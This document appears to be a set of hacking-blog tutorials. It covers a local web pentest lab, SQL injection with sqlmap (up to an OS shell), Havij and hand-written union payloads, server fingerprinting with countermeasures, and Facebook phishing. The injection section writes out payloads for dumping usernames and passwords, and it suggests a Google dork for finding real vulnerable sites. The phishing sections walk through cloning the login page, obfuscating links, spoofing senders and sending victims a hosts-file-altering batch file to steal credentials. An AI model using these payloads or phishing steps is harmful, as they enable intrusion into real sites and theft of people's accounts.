Website hacking

Good Evening friends. Today we will see a step by step guide  on how to create a web application pentest lab .

For creating this lab, I am using a host machine with Windows 7 installed on it.  We also need the following softwares.

1. Wamp server ( Download here)

2. Vulnerawa ( Download here )

3. Vmware Workstation   or Oracle Virtualbox ( Download here )

4. Kali Linux ( Download here )

Download the above softwares to your system. Install Wamp server.  For this WAPT lab,  we will use vulnerawa as a vulnerable website or target website. Extract the contents of the vulnerawa.zip folder to the root folder of the wamp server. Now open a browser and and type localhost in the urlbar to see if you can see the victim webapp as shown below.

wapt1

Click on “Create Database” to create some data which we will use in our future howto’s.

wapt2

Now let’s change the permissions of the wamp server to access it from our attacker machine. Go to Apache>httpd.conf as shown below.

wapt3

You should see the httpd.conf as shown below.  Type CTRL+F and search for word “stuff”. After you find it, make changes  as shown below in the red box. Save the file by typing CTRL+S  and restart the wamp server.

wapt4

Now install Kali Linux in Vmware Workstation or Oracle Virtualbox (see how ). Set the network adapter to NAT. Now open command line in your host machine and check the IP address assigned to your host machine as shown below by typing command “ipconfig”. Since I am using Vmware Workstation my network adapter is Vmware network adapter vmnet8. The IP address assigned to my host machine is 192.168.64.1.

wapt5

Now start your attacker machine( Kali Linux ), open browser and type the address 192.168.64.1 in the url bar and see if you can access the victim web application as shown below.

wapt6

 

wapt7

Your web application pentest lab is ready. Happy hacking.

Hi Friends. Today we will see how to perform sql injection with  sqlmap. Sqlmap  is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers “. It is pre-installed in Kali Linux. For this tutorial I am using vulnerawa as target and it is necessary to setup a webapp pentest lab with it. See how to set up a webapp pentest lab.

If the webapp pentest lab is all ready. Open the browser in Kali linux and type the address as shown below.( the ip address may differ for you ). You should see the vulnerawa web page as shown below. Click on “About”.

sqlmap1

The below webpage will open. It shows about the founders of Vulnerawa.

sqlmap2

Click on “founder 1”. It will show brief details about him as shown below.

sqlmap3

Similarly go back and click on “Founder 2” and “Founder 3”. The result will be as below.  Now if you have observed, the “id” parameter in the url changes as we click on different users. For founder 1, it is 1 and sequentially.

sqlmap4

sqlmap5

Now introduce a single quote( ‘ ) character in the url. after the number as shown below.

sqlmap6

Click on “Enter” and the page will show an error as shown below. “You have an error as shown below……..”. This is a clear sign that the webpage is vulnerable to SQL injection.

sqlmap7

Now open SQLmap from the path as shown below.

sqlmap8

Now copy the vulnerable url and type the following command the terminal. Here -u stands for url.

sqlmap9

The result will be as shown below. It will reveal the website technology and the scripting language used.

sqlmap10

Now let’s grab the banner of the website. Type the following command and hit “Enter”.

sqlmap11

You can see the banner as shown below.

sqlmap12

To see the current user of the website, type the following command.

sqlmap13

The current user  can be seen as below.

sqlmap14

Now let us see the current database used by the website. Type the following command.

sqlmap15

We can see that the current database is “Vulneraw”.

sqlmap16

Now let us see all the tables present in the database “Vulneraw” by using following command.

sqlmap17

We see that we have only one table in the current database. The table is “users”.

sqlmap18

Now lets see the number of columns in the table “users”. Type the following command.

sqlmap19

We see there are four columns in table “users”.

sqlmap20

Now let’s dump the values of two columns username and password by typing the following command.

sqlmap21

The result is as below. we got the username and passwords.

sqlmap22\

If we want to dump all the entries of the table, type the following command.

sqlmap23

Here are the entries.

sqlmap24

Now let’s see if we are lucky enough to get the shell of the target. Shell is the target machine’s command line or terminal. Type the following command.

sqlmap25

It will prompt us to enter the application language being used by the website. We already know it is PHP. Enter its value. Next it will prompt you to enter the writable directory. You cam choose your option wisely. I chose the default root directory for wamp server. Hit on “Enter”.

sqlmap26

I successfully got the os-shell. Now let’s try some commands. Type “dir” to see the contents  of the root directory. It works as shown below.

sqlmap27

 

sqlmap28

Let’s see how many users are there on the system. Type the command “net user” . We can see the users listed as below. Happy hacking practice.

sqlmap28

To find sites vulnerable to this sql injection use google dork “site:.com inurl:id=1” or simlar dorks.

 

“When the time for the march of one’s enemy’s army has approached, one has to obstruct the enemy or send him far away, or make his movements fruitless, or, by false promise, cause him to delay the march, and then deceive him after the time for his march has passed away. One should ever be vigilant to increase one’s own resources and frustrate the attempts of one’s enemy to gain in strength.”

-Kautilya, Arthashastra.

Bannergrabbing or fingerprinting is the method of gaining information about the target host OS. web server type, version etc. Once the hacker gets the needed information about the target OS etc, he can easily find out the vulnerabilities present in particular version and launch his attacks against it. Today we are going to see how webserver bannergrabbing is performed on web servers and how to apply counter measures to it. We will see Apache and IIS 8 server examples in this article.

Apache:

Imagine I have set up a website named www.shunya.com on an Apache server. A hacker can easily find Information about the web server in different ways. For example, a hacker can visit the website and and try to open a webpage which is not existent on my server,like below.

wbc1

 

In the above example, hacker tried to open page named “admin.php” which was not available on my server and in turn the server responded with a type of web server, the target OS and the scripting language. This is giving out too much information.

The traditional and popular way of fingerprinting is through telnet. A hacker opens command line or terminal. and types the command “telnet www.shunya.com 80″. When the screen goes black, type “HEAD / HTTP/1.0″ and this will give the server information.

wbc2

 

There are also many fingerprinting tools available. I am gonna show you only one, Id serve. Let’s see how to banner grab using Id serve.

wbc3

 

Now what are the preventive measures we can take in Apache server to disable or atleast prevent fingerprinting to some extent. Apache web server has a configuration file called “httpd.conf” where we can make changes to fight fingerprinting. Go to httpd.conf and change the value of the option “Server Signature  to off”. This will not display any information about server when an nonexistent page has been accessed.

wbc4

 

In the httpd.conf file, changing the value of “Server Tokens” from “Full” to “Prod” will only show the minimum server information as shown below.

wbc5

wbc6

 

 

This still discloses that our web server is Apache but it doesn’t show the version. In Kautilya’s words this is delaying the march of enemy. Here are the options we set.

wbc7

 

IIS 8:

Now imagine we changed our www.shunya.com website from Apache server to the latest version of Microsoft web server, IIS 8. To prevent error pages form revealing any infomation in IIS server, we can set custom error pages.  Now let’s use IDserve tool to fingerprint the IIS 8 server.

wbc8

 

It shows the server version. Now how can we prevent this. Microsoft provides a tool named UrlScan freely available for download which can be used easily to process HTTP requests. Download this tool and install it. ( See how to configure Urlscan for IIS 7.5 and IIS 8 ). Then go to the configuration file of UrlScan, “UrlScan.ini” located at “C:WindowsSystem32inetservUrlscan” by default and change the value of “RemoveServerHeader’ from “0″ to “1″.

wbc9

 

This will not reveal the server version information as shown below.

wbc10

 

We can further mislead the attacker by setting our server name to some other value different than our original one. This can be done by setting the value of “RemoveServerHeader” to “0 “and changing the value of “AlternateServerName” to the value we want to specify ( in our example Nginx ).

wbc11

 

So when the attacker tries to fingerprint our website, he will be misleaded.

wbc12

 

Note: Taking this preventive measures will not stop a determined hacker to find out our server information.

NOTE : This is strictly for educative purposes.

 

Havij is an automated SQL injection tool. To say in the own words of its creators,

” Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands. ”

It is available both in free and commercial versions. Today we are going to see how to dump the contents of a database using Havij. For this I am going to use the free version. First download Havij from here and install it. Then open it and enter the vulnerable page url in the target column ( for this tut I am using my own vulnerable webpage ).

havij1

 

Set the database option to ‘auto detect‘ and hit analyse. This should show you the current database name as shown below.

havij2

 

Click on the “info” tab. This will show you information about the victim’s system. We can see information like Host IP address, web server version etc.

havij3

 

Click on the “Tables” tab.

havij4

 

Click on “Get DBs” option. This will list all the databases as shown below.

havij5

 

To get tables in a specific database, select the database and click on Get Tables”. This will list all the tables present in the selected database. I selected database “shunya” here.

havij6

 

We can see that there is on table ‘users’ in our database ‘shunya’ .To get columns , select the table ‘ users’ and click on “Get Columns”.

havij7

 

Thia will list all the columns in the table. We can see that we have five columns in the table ‘users’.all the columns. It’s time to dump the values of columns. Select the columns whose data we want to dump and click on Get data”. Here I selected all the columns.

havij8

 

We got all the data including usernames and passwords. But passwords seem to be encrypted. No problem. Click on the password hashes and copy them. Then click on MD5″ tab and paste the password. Click on “Start”. Havij automatically decrypts the password for us. Decrypt all passwords in the similar manner.

havij9

 

Click on “Find admin”. This option finds the admin  page of the website automatically. When it finds the admin page, you can try the username and passwords to get access to the website. Hope this was helpful.

havij10

 

Here’s a video version of this howto.

 

There are many articles on internet on SQL injection but most of them only give you queries and don’t display the ensuing result. So here, I have made a miniscule attempt to explain sql injection for beginners. For this, I have made my own webpage vulnerable to SQL injection and hosted it on Wamp server.  I hope this will be helpful for beginners to understand sql injection.

Imagine any hacker searching for sql vulnerable sites using google dorks comes to this website shown below.

sqlb1

The above is a webpage displaying some sort of information about the company’s founders.  What happens when we click on “Founder 1″? It displays some information about Founder 1 as shown below.

sqlb2

Notice that there is a small change in the url. it says id=1 at the last.  Now what if we go back and click on “Founder 2”,  it displays information about founder 2 and the url changes to ‘id=2. This implies that the webpage is using PHP $_GET query to fetch data from database.

sqlb3

Well let’s see if the webpage is vulnerable. In the address bar, add a single quote after the id=1. like below

“id=1”

sqlb4

If you get an error as shown above, then the site is vulnerable to sql injection. Since we know this site is vulnerable to sql injection, lets’ see the number of columns in the database. Use the query

id=1 order by 1 

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value without the error are the number of columns present. The ‘order by’ query in SQL is used to sort the data. When no option is specified it sorts in ascending order by default. Sometimes you may not see any error no matter how much you increase the value, like the case below where I have not received an error until the value of 15.

sqlb5

Maybe there are fifteen columns ( the chances are very low though) or our query is not working. Let’s use another query.

id=1′ order by 1–+ 

We can see below that the value 3 returns us an error like below. This means there are two columns.

sqlb6

 

If the latter query works then you should use it all through the injection. The characters ‘–‘ comment the code after them.

Now we know there are  two columns. Let’s find out the vulnerable columns in the website.Type

id=-1′ union select 1,2–+ 

The vulnerable columns are displayed as below. Here both the columns are vulnerable but you may not be so lucky all the time.

sqlb7

If the above query doesn’t work, use

id=1′ and 1=2 union select 1,2–+

sqlb8

Now let’s find out the database version. We already know the number of columns. Use query,

id=-1′ union select version(),2–+

sqlb9

The version is 5.6.2-log. Now let’s find out the names of all the databases present. Use query,

id=-1′ union select group_concat(schema_name),2 from information_schema.schemata–+

This will display all the databases. You can see the list of databases present below. You can see dvwa database which I used earlier for practice.

sqlb10

We know all the databases. Now let’s see the database being used by our website. Use query,

id=-1′ union select database(),2–+

sqlb11

 

So, Shunya is the database being used by our website. Let’s see the current user.

id=-1′ union select user(),2–+

sqlb12

We know root is the default user on wamp server. Now let’s find out tables present in the ‘shunya’ database.

id=-1′ union select group_concat(table_name),2 from information_schema.tables where table_schema=database()–+

sqlb13

The table name is ‘users’. Now let’s find out the column names in the table ‘users’.

id=-1′ union select group_concat(column_name),2 from information_schema.columns where table_schema=database()–+

sqlb14

We got the column names. Now let’s dump the values of some interesting columns. Let’s dump “username” and “password” values.

id=-1′ union select group_concat(username,0x3a,password,0x3a),2 from users–+

sqlb15

We successfully dumped the usernames and passwords. The value 0x3a introduces a colon between the dumped values for readabiltiy. Now let’s dump all the values from the table ‘users’.

id=-1′ union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password,0x3a,),2 from users–+

sqlb16

We have successfully performed sql injection and dumped the values. Hope this was helpful.

Note: This is for educative purposes only.

Have you ever read “Life on Earth” by David Attenborough. It’s a very nice book about the evolution of animals. What is evolution? Wikipedia defines it as the “change in the inherited characteristics of biological populations over successive generations”. Why are we talking about evolution now. Because personally I feel Desktop phishing is an evolution over Phishing. It evolved to overcome the disadvantages in phishing. Let’s see how.

The process in desktop phishing is same as in phishing. The only difference is in the method of uploading our phishing files. Whereas in phishing we upload our files to an external server, in desktop phishing we upload our files to the server on our desktop. Why? Because there are three disadvantages in the former  method.

One, however hard we may try the url always looks suspicious.

dphish1

 

Two, modern day browsers are capable of  detecting phishing sites.

dpish2

 

Three, as soon as the webhosting provider detects that you hosted a phishing site, he will suspend your account. This will most likely happen within 24 hours. Desktop phishing overcomes all these defects. So now, let’s see how to hack a Facebook account with desktop phishing.As already told, this process is same as phishing, until the creation of phishing files which you can find  here. Now Install Wamp Server on your windows machine. To see what wampserver is and how to install it, click here. Next, install a VPN on your system to keep your IP static. See here. We are going to host our phishing files on our desktop and redirect the victim to our site.

Now copy our phishing files to the folder C:/wamp/www. This is the root directory of the wamp server.

dpish3

Here is the script of the “phish.php” we used.

dphish3a

 

Go to folder “C:/wamp/bin/apache/Apache 2.4.4/conf” and make changes to the ‘httpd.conf’ file as below. These changes give permission to external users to access your fake website.

dpish4

 

Start your wamp server, open your browser and type localhost” in the url to see if your phishing site is working. Then open Notepad and create a batch file as shown below.We need to send this file to the victim machine and make him execute it. See how? Make sure you replace the IP address below with one assigned by VPN.

dpish5

 

What the above script does is it changes the hosts file in the victim’s system to redirect to your fake website when user tries to access Facebook. Now, what is hosts file?

Hosts file is a text file located in the folder “C:/windows/system32/drivers/etc” which resolves IP addresses associated with domain names.

dpish6

 

Usually when we try to vist any website say www.google.com our system sends a query for it’s IP address to the DNS server. When we make an entry in the hosts file of our computer, the query is not sent to the DNS server. When the victim clicks on the executable sent by us,it changes the hosts file like below.

dpish7

 

Now when victim types “www.facebook.com” in his browser, he is redirected to our wamp server. Notice that the url looks completely genuine and the browser didn’t detect it as a phishing site.

dpish8

When the unsuspecting victim enters his credentials,

dpish9

 

a text file called pass .txt is created in the www directory.

dpish10

Open the file and we can see the credentials.

dpish11

 

       “Whoever, fraudulently or dishonestly makes use of the electronic signature, password or any  other unique identification feature of any other person, shall be punished with imprisonment of either  description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh.”

Information Technology Act 2008

Yes, that’s what Law in India says about identity theft. Then why make this tutorial? Well, Let me make this very clear that this is only for educative purposes and I will not be held responsible for any action coming out of this article. To take a line from the movie Mission Impossible – 2  “to create bellerophon we always create chimera.” I hope this article will be more helpful than the other articles available about phishing on the internet.

What is phishing? Phishing is an act of presenting a fake page resembling the original webpage you intend to visit with the sole intention of stealing your credentials. Although this article explains how to hack facebook account via phishing, this method can be used to phish any website. Phishing is the most popular method of hacking a facebook account. So now let’s phish.

In your browser, open website of facebook. Right click on the webpage, click on “view page source”.

phish1

The source of the page is displayed in the browser. Right click on the page and click on “Save As”. Save the page as “index.html” on your computer.

phish2

Now open index.html using notepad and hit CTRL+F”.In the Find box opened, type “action” and  click on “Find Next”. Look at the value of action.

phish3

Now change the value of action to “phish.php”. We are doing this so when the user enters his credentials the page that loads will be “phish.php” and not the page Facebook wants.

phish4

Now let’s create the page phish.php. Open Notepad and type the following script into it and save it as “phish.php”. What this script does is it logs the user credentials and saves it to a file named “pass.txt”.

phish5

Now our files are ready.Next step is to upload these files to any free web hosting site available on the internet. Google for free web hosting sites, select any one of them(I selected bytehost7), create an account with username as close to Facebook as possible and delete the index.html file available in the htdocs folder.Then using Online File Management upload your own index.html and phish.php files to the htdocs folder. Your htdocs folder will look like below.

phish6

 Let’s check if our phishing page is ready by typing the address of our site. If the page is like below, then our phishing page is working.

phish7

The next thing we have to do is to send address of our fake website to the victim. We will do this through sending him an email but in order for the victim not to smell something fishy, we will obfuscate the url of the fake page we are about to send him. The sending email address should be as convincingly close to facebook as possible.

phish8

 When the victim clicks on the obfuscated url, it will bring him to our fake site.

phish9

 If the victim is not cautious enough as to observing the url and enters  his username and password, our attempt is a success. To show this, I will enter random values in both username field and password field and hit Enter.

phish10

Now a txt file with name pass.txt will be created in the htdocs folder containing both the username and the password.

phish11

 Click on the file. We can see both the email and the password i have entered. The email is “don’t get hacked” and the password is “like me”.

phish12

Find it difficult? See how to do phishing with Weeman HTTP server

 Counter Point:

If you don’t want to fall victim to phishing, you can take a few precautions . If you want to open a site type the address directly in the url and don’t open any redirected links. Don’t click on any mails which look malicious like asking for your login credentials.